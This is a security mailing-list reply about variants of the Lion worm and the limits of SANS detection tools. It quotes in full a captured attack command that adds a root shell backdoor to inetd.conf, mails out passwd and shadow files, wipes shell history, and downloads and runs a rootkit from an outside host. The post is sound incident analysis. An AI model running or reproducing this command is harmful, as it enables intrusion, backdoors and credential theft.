Re: Lion Worm/crew.tgz

[David Brumley <dbrumley () RTFM STANFORD EDU>]

> Neil Long <neil.long () computing-services oxford ac uk> mailed me and
> mentioned that it might be worth pointing out that the SANS GIAC analysis
> is not valid for the crew.tgz version that was sent to Incidents by
> Andreas stling <andreaso () IT SU SE>
>
> There is no t0rn rootkit involved and the root shell is on  1008 so their
> Lionfind may be misleading.
>
> Of course, they could be half a dozen variants on the loose by this stage.
                                  ^^^^^^^^^^^^^^

In february we saw the following exploit:
PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin';export PATH;export TERM=vt
100;rm -rf /dev/.lib;mkdir /dev/.lib;cd /dev/.lib;echo '1008 stream tcp nowait r
oot /bin/sh sh' >>/etc/inetd.conf;killall -HUP inetd;ifconfig -a>1i0n;cat /etc/p
asswd >>1i0n;cat /etc/shadow >>1i0n;mail 1i0nip () china com <1i0n;rm -fr 1i0n;rm -
fr /.bash_history;lynx -dump http://coollion.51.net/crew.tgz >1i0n.tgz;tar -zxvf
 1i0n.tgz;rm -fr 1i0n.tgz;cd lib;./1i0n.sh;exit;

The tar file did contain t0rn.  This is why the sort of tools sans
released are good heuristics, but not definitive.  The same can be
said for rootkit scanners, IDS systems, and just about anything else.

ho hum.
-djb
--
#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#
David Brumley - Stanford Computer Security -   dbrumley at Stanford.EDU
Phone: +1-650-723-2445           WWW: http://www.stanford.edu/~dbrumley
Fax:   +1-650-725-9121  PGP: finger dbrumley-pgp at sunset.Stanford.EDU
#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#
Life is a whim of several billion cells to be you for a while.